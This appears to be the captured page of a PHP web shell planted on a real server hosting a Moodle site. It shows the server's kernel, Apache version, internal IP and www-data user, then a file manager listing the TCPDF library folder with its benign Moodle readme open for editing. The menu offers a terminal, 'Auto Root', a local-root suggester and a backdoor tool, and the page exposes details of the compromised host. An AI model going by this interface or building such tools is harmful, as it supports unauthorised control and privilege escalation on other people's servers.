Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
sipdm.cesa.co.za /
lib /
tcpdf /
Delete
Unzip
Name
Size
Permission
Date
Action
config
[ DIR ]
drwxr-sr-x
2017-06-22 15:50
fonts
[ DIR ]
drwxr-sr-x
2017-06-22 15:50
include
[ DIR ]
drwxr-sr-x
2017-06-22 15:51
CHANGELOG.TXT
113.3
KB
-rw-r--r--
2017-06-22 15:50
LICENSE.TXT
42.61
KB
-rw-r--r--
2017-06-22 15:51
README.TXT
5.5
KB
-rw-r--r--
2017-06-22 15:51
composer.json
922
B
-rw-r--r--
2017-06-22 15:50
readme_moodle.txt
1.87
KB
-rw-r--r--
2017-06-22 15:51
tcpdf.php
876.14
KB
-rw-r--r--
2017-06-22 15:51
tcpdf_autoconfig.php
6.99
KB
-rw-r--r--
2017-06-22 15:51
tcpdf_barcodes_1d.php
71.69
KB
-rw-r--r--
2017-06-22 15:51
tcpdf_barcodes_2d.php
14.34
KB
-rw-r--r--
2017-06-22 15:51
tcpdf_parser.php
26.99
KB
-rw-r--r--
2017-06-22 15:51
Save
Rename
Description of TCPDF library import 6.2.12 =========================================== * delete examples/, tools/ and tcpdf_import.php * remove tcpdf_import.php from composer.json * remove all fonts that were not already present * visit http://127.0.0.1/lib/tests/other/pdflibtestpage.php and view the pdf 2015/09/29 ---------- Upgrade to tcpdf_php5 TCPDF 6.2.12 (MDL-51534) by Jun Pataleta <jun@moodle.com> 2015/03/23 ---------- Upgrade to tcpdf_php5 TCPDF 6.2.6 (MDL-49522) by Adrian Greeve <adrian@moodle.com> 2011/10/29 ---------- Upgrade to tcpdf_php5 TCPDF 5.9.133 (MDL-29283) by Petr Skoda 2009/11/19 ---------- Upgrade to tcpdf_php5 TCPDF 4.8.014 (MDL-20888) by David Mudrak <david.mudrak@gmail.com> 2009/07/20 ---------- Upgrade to tcpdf_php5 TCPDF 4.6.020 (MDL-19876) by David Mudrak <david.mudrak@gmail.com> * deleted cache/ doc/ examples/ config/tcpdf_config_alt.php config/lang/ images/ * removed all fonts but the core ones (courier.php, helveticabi.php, helveticab.php, helveticai.php, helvetica.php, symbol.php, timesbi.php, timesb.php, timesi.php, times.php, zapfdingbats.php) and FreeFont * FreeFont chosen as a default utf8 font distributed by default, all others will be downloadable from moodle.org via new UI * removed font/utils/ * moving configuration to the lib/pdflib.php wrapper so we do not need to modify TCPDF at all. Credit to Chardelle Busch for this solution in MDL-17179 2008/07/29 ---------- Upgrade to tcpdf_php5 TCPDF 4.0.015 (MDL-15055) by David Mudrak <david.mudrak@gmail.com> * deleted cache/ doc/ examples/ * modified config/tcpdf_config.php Default values for K_PATH_MAIN and K_PATH_URL are automatically set for the Moodle installation. K_PATH_CACHE set to Moodle datadir cache. K_PATH_URL_CACHE can't be mapped in Moodle as datadir should not be accessible directly. However, it doesn't seem to be used within the library code.